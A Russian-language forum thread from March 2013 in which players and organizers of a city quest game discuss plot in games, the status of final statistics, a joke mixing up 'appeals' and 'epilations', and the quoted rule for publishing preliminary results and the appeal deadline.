Отсутствие сюжетов меня тоже печалит. Но тут вообще все зависит от авторов, они же постоянно разные у всех свое видение. Также стоит разделять понятия сюжет и тема. Если речь идет именно о сюжете, тобишь как о квестовой составлящей, то это довольно таки сложно, таких игр не очень много. я не беру в рассмотрение якобы сюжетные игры по всяким фильмам/книгам/играм, когда взяты просто имена героев и некоторые сценки обыграны в заданиях и на местах какиенить чухи в кокошниках.

Всё верно.
Порой очень непросто натянуть сюжет на игровую схему, сохранив при этом соревновательность, равные условия и "изолированное" прохождение сюжета командами (что является необходимым условием равных условий).
Самой сюжетной игрой была провокация от ДРК и компании. Соревновательности и изолированности там и рядом не было, в итоге - всем второе место и 15 очков. Не скажу, что мне не понравилось, но, если бы все игры были такими, то дедлайна в его текущем виде, наверное, уже бы не было.

El Red 18-03-2013 10:34

Цитата:

Сообщение от Jaguar (Сообщение 260605)
Ваня, стата окончательная?

нет, еще разобраны не все эпиляции.
постараемся скорее закончить.

Jaguar 18-03-2013 12:32

Цитата:

Сообщение от El Red (Сообщение 260608)
нет, еще разобраны не все эпиляции.
постараемся скорее закончить.

у тебя свой новый бизнес? делаешь эпиляции?:D

El Red 18-03-2013 12:44

эпиляции делают игравшие команды. а мы избавляем их от мук. или не избавляем. или не их.

Jaguar 18-03-2013 13:10

Цитата:

Сообщение от El Red (Сообщение 260619)
эпиляции делают игравшие команды. а мы избавляем их от мук. или не избавляем. или не их.

шутка юмора:blabla:

Ol4ik 18-03-2013 13:22

Цитата:

Сообщение от Jaguar (Сообщение 260620)
шутка юмора:blabla:

ты просто слово лопата не заметил ))

El Red 18-03-2013 13:22

По просьбам буквоедов)

Цитата:

3.5.1. Организаторы игры обязаны огласить подробные предварительные результаты в течение 72 часов после завершения игры (игра считается завершённой, когда в ней не осталось играющих команд). Результаты должны быть опубликованы в игровой системе либо на форуме проекта. Они должны содержать статистику каждой команды по каждому уровню с указанием причин штрафов, если таковые есть, а также подробный сценарий игры с комментариями.
Предварительные результаты
Сценарий с комментариями
Статистика по уровням

Срок окончания приема апелляций - 19.03.2013 13:10

El Red 18-03-2013 14:08

Чтобы избежать лишних вопросов: стата будет пересчитана в гуглдоке по времени получения и прохождения уровней


Часовой пояс GMT +3, время: 05:28.

Powered by: vBulletin Version 3.8.7 (Russian)
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.